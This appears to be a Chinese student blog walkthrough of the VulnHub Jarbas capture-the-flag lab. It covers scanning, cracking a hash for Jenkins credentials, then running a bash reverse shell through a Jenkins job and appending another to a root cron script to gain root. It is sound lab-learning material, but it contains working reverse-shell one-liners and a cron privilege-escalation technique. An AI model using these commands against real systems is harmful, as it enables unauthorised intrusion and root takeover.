前言
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。
ps:这是小编以前大二的期末渗透考题,所以比较简洁( ‘-ωก̀ )
一、环境配置及靶场下载
靶场下载地址:https://download.vulnhub.com/jarbas/Jarbas.zip
1.下载靶场文件,然后打开
靶机和攻击机设置为同一网段就好,小编设置的是kali还有靶机都是NAT模式
二、信息收集
1、探测主机存活
靶场扫描nmap -sV 192.16.22.0/24
2、目录扫描
扫描网站目录 dirb http://192.168.22.145/ -X .html
3、进入access.html
进入网站,对加密密码进行ND5解密,获得网站后台账号密码eder/vipsu
三、漏洞利用
1、进入后台
进入网站后台 192.168.22.139:8080
2、构建任务 进行 shell 反弹
创建反弹shell:bash -i &> /dev/tcp/192.168.22.139/1111 0>&1
跟着下面图片的步骤:
注意ip还有端口写上kali的ip和端口
四、kali上线
1.kali起监听
在kali监听1111端口,因为刚刚我们写的shell反弹到kali的1111端口
nc -lvnp 1111 //监听1111端口
2.启动脚本
五、crontab计划任务提权
1、上线成功,查看定时任务
查看计划任务发现flag1还有flag3
cat /etc/crontab //查看计划任务·
查看存在一个以root权限执行的脚本,每五分钟执行一次,尝试写入反弹shell
2、计划任务提权
在/etc/script/CleaningScript.sh计划任务中写入反弹shell
shell echo "/bin/bash -i &> /dev/tcp/192.168.22.139/2222 0>&1" >> /etc/script/CleaningScript.sh
3、然后在开一个终端,起监听
六、上线成功,查找flag
1、因为这个脚本每五分钟运行一次,所以需要等五分钟
2、上线成功,可以看到是root权限
查找flag find / -name “*flag*” //在系统中查找带有flag的文件
搞定!!!